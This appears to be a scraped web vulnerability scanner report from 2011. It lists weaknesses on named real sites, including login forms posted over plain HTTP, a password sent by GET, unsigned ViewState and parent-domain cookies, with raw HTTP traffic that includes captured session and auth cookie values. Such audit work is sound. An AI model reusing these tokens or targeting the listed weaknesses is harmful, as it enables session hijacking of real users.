The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://activity.livefaceonweb.com/default.aspx
The form contains the following password field:
txtPass
Request
GET / HTTP/1.1 Host: activity.livefaceonweb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Date: Sun, 09 Jan 2011 02:02:02 GMT Connection: close Content-Length: 2896
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://diythemes.com/amember/login.php
The form contains the following password field:
amember_pass
Request
GET /thesis/ HTTP/1.1 Host: diythemes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://mail.cmsinter.net/Login.aspx
The form contains the following password field:
txtPassword
Request
GET /Login.aspx HTTP/1.1 Host: mail.cmsinter.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=215573381.1294526267.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215573381.1031492532.1294526267.1294526267.1294526267.1; __utmc=215573381; __utmb=215573381.3.10.1294526267; authCookie=;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:21:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: authCookie=; expires=Tue, 12-Oct-1999 04:00:00 GMT; path=/; HttpOnly Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 8153
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field:
password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy2.php
The form contains the following password field:
Password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field:
password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field:
Password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field:
Password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field:
password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
GET /article/SB10001424052748704415104576066830729058232.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:36 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=aa545813-1265-4e4a-a92e-4927fb4c2e16; domain=.wsj.com; path=/; Expires=Tue Jan 05 20:21:36 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST Cache-Control: max-age=15 Expires: Sun, 09 Jan 2011 01:21:51 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=46 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 139880
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://commerce.wsj.com/auth/submitlogin
The form contains the following password field:
password
Request
GET /article/SB10001424052748704415104576066830729058232.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:36 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=aa545813-1265-4e4a-a92e-4927fb4c2e16; domain=.wsj.com; path=/; Expires=Tue Jan 05 20:21:36 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST Cache-Control: max-age=15 Expires: Sun, 09 Jan 2011 01:21:51 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=46 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 139880
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /video/426755/peanut-labs/ HTTP/1.1 Host: revver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:32:22 GMT Server: Apache/2.0.55 (Ubuntu) mod_python/3.1.4 Python/2.4.3 Expires: Sun, 09 Jan 2011 02:33:33 GMT Vary: Cookie Last-Modified: Sun, 09 Jan 2011 02:28:33 GMT ETag: b8fdf6d76062d0f9cc23a77e2e8edebb Cache-Control: max-age=300 Content-Type: text/html; charset=utf-8 Connection: close Content-Length: 81237
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://themeforest.net/signin/authenticate
The form contains the following password field:
password
Request
GET /user/freshface/portfolio HTTP/1.1 Host: themeforest.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://wordpress.org/extend/plugins/bb-login.php
The form contains the following password field:
password
Request
GET /extend/plugins/wp-pagenavi/ HTTP/1.1 Host: wordpress.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 09 Jan 2011 02:29:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding Content-Length: 23436
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profil ...[SNIP]... </h2>
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.43things.com/auth/login
The form contains the following password field:
person[password]
Request
GET /person/ HTTP/1.1 Host: www.43things.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 01:38:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4 X-Runtime: 0.00959 Cache-Control: no-cache Set-Cookie: ubid=ShCp%2FqO8Bd%2FNd5qzqksfk3o337c%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT Set-Cookie: auth=Zaocciefe2iud12Jq25sodTcu2vit7TjegQeSYLGVdilfdfNS7JNv0gado1gfauX2reopc1qxAeqCAoyKTVvomHrTkdZTDb6d12Tjt3FOfo%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _session_id=c7e240c834b15ca5d9602a149dcd92ca; domain=.43things.com; path=/ Content-Length: 13687 Status: 404 Not Found Cache-Control: max-age=1 Expires: Sun, 09 Jan 2011 01:38:28 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>43 Things</title> <m ...[SNIP]... </div>
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.facebook.com/
The form contains the following password field:
reg_passwd__
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=BqNeE; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:42 GMT Content-Length: 29867
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.mlive.com/
The form contains the following password field:
password
Request
GET / HTTP/1.1 Host: www.mlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM' Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=1 Expires: Sun, 09 Jan 2011 01:44:45 GMT Date: Sun, 09 Jan 2011 01:44:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107391
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.onestat.com/Default.aspx
The form contains the following password field:
MemberLoginCompact1$Login1$Password
Request
GET / HTTP/1.1 Host: www.onestat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 02:31:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=wdsxsqfwe5o3umirakad3355; path=/; HttpOnly Set-Cookie: UILanguage=en; expires=Sat, 09-Jan-2016 02:31:56 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 19494
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> OneStat.com We ...[SNIP]... <div class="container"> <form name="form1" method="post" action="Default.aspx" id="form1"> <div> ...[SNIP]... <td><input name="MemberLoginCompact1$Login1$Password" type="password" id="MemberLoginCompact1_Login1_Password" class="login" /></td> ...[SNIP]...
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
GET / HTTP/1.1 Host: www.slidedeck.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:08:03 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Sun, 02 Jan 2011 03:07:02 GMT Last-Modified: Sun, 09 Jan 2011 03:08:03 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.slidedeck.com/xmlrpc.php Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 46540
7. Password field submitted using GET methodpreviousnext
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.rockband.com
Path:
/
Issue detail
The page contains a form with the following action URL, which is submitted using the GET method:
http://www.rockband.com/
The form contains the following password field:
password
Issue background
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
Request
GET / HTTP/1.1 Host: www.rockband.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache X-MyHeader: (null) X-Duration: D=677765 microseconds Content-Type: text/html; charset=utf-8 Expires: Sun, 09 Jan 2011 02:53:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 09 Jan 2011 02:53:52 GMT Content-Length: 19192 Connection: close Set-Cookie: rb_s=3a49e7e697e2c5f07de70a8b370be1bb; path=/
The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.
By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.
You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.
Issue remediation
There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.
GET / HTTP/1.1 Host: beta-ads.ace.advertising.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Date: Sun, 09 Jan 2011 02:03:43 GMT Content-Length: 1402 Connection: close Set-Cookie: A07L=CT; expires=Sun, 06-Feb-2011 02:03:43 GMT; path=/; domain=beta-ads.ace.advertising.com P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /article/SB10001424052748704415104576066830729058232.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:36 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=aa545813-1265-4e4a-a92e-4927fb4c2e16; domain=.wsj.com; path=/; Expires=Tue Jan 05 20:21:36 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST Cache-Control: max-age=15 Expires: Sun, 09 Jan 2011 01:21:51 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=46 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 139880
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
ubid=ShCp%2FqO8Bd%2FNd5qzqksfk3o337c%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT
auth=Zaocciefe2iud12Jq25sodTcu2vit7TjegQeSYLGVdilfdfNS7JNv0gado1gfauX2reopc1qxAeqCAoyKTVvomHrTkdZTDb6d12Tjt3FOfo%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /person/ HTTP/1.1 Host: www.43things.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 01:38:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4 X-Runtime: 0.00959 Cache-Control: no-cache Set-Cookie: ubid=ShCp%2FqO8Bd%2FNd5qzqksfk3o337c%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT Set-Cookie: auth=Zaocciefe2iud12Jq25sodTcu2vit7TjegQeSYLGVdilfdfNS7JNv0gado1gfauX2reopc1qxAeqCAoyKTVvomHrTkdZTDb6d12Tjt3FOfo%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _session_id=c7e240c834b15ca5d9602a149dcd92ca; domain=.43things.com; path=/ Content-Length: 13687 Status: 404 Not Found Cache-Control: max-age=1 Expires: Sun, 09 Jan 2011 01:38:28 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>43 Things</title> <m ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc- HTTP/1.1 Host: www.freshnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; expires=Tue, 01 Feb 2011 05:08:39 GMT; path=/; domain=.peanutlabs.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /peanutlabs/ HTTP/1.1 Host: www.peanutlabs.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pl_email=test4%40fastdial.net; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.2.10.1294536629
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode HTTP/1.1 Host: www.peanutlabs.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
id=c653243310000d9|2070351/902302/14983|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click;h=v8/3a8a/4/a7/%2a/i;227307433;1-0;0;50967133;3454-728/90;34263360/34281238/1;;~sscs=%3fhttp://ad.amgdgt.com/ads/t=c/s=AAAAAQAUOYaxqp9Z1IP2BTtF0ZY7xajP5TxnZW8sdXNhLHQsMTI5NDUzNjEzNjEyNSxjLDI4MzAxMixwYyw2NTA0NCxhYywxMjg4ODcsbyxUNC1QMCxsLDUxODExCg--/clkurl=http://www.fullsail.edu/index.cfm?fa=landing.GDBSO_1a&mnc=1431&kw=Robot%20NFHC&utm_source=Frontline+Direct&utm_medium=banner&utm_term=Robot%20NFHC&utm_content=GDBSO_1a&utm_campaign=GDBS-O HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUOYaxqp9Z1IP2BTtF0ZY7xajP5TxnZW8sdXNhLHQsMTI5NDUzNjEzNjEyNSxjLDI4MzAxMixwYyw2NTA0NCxhYywxMjg4ODcsbyxUNC1QMCxsLDUxODExCg--/clkurl=http://www.fullsail.edu/index.cfm?fa=landing.GDBSO_1a&mnc=1431&kw=Robot%20NFHC&utm_source=Frontline+Direct&utm_medium=banner&utm_term=Robot%20NFHC&utm_content=GDBSO_1a&utm_campaign=GDBS-O Set-Cookie: id=c653243310000d9|2070351/902302/14983|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sun, 09 Jan 2011 02:03:13 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /server/pixel.htm?fpid=10&sp=y&publisher_redirecturl=http://ad.afy11.net/ad?mode=7 HTTP/1.1 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pf=TiY2Y7UsIzsDKs0LviDMrF7Y4FfMul_JqNyl-f7qrdKJwV9kSIzX4BtZ7vBDkFqi6PyIdXvx0rnLfhzRtOOBc34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=undefined%7Cundefined%7Cundefined%7C4; rds=undefined%7Cundefined%7Cundefined%7C14983; rv=1
Response
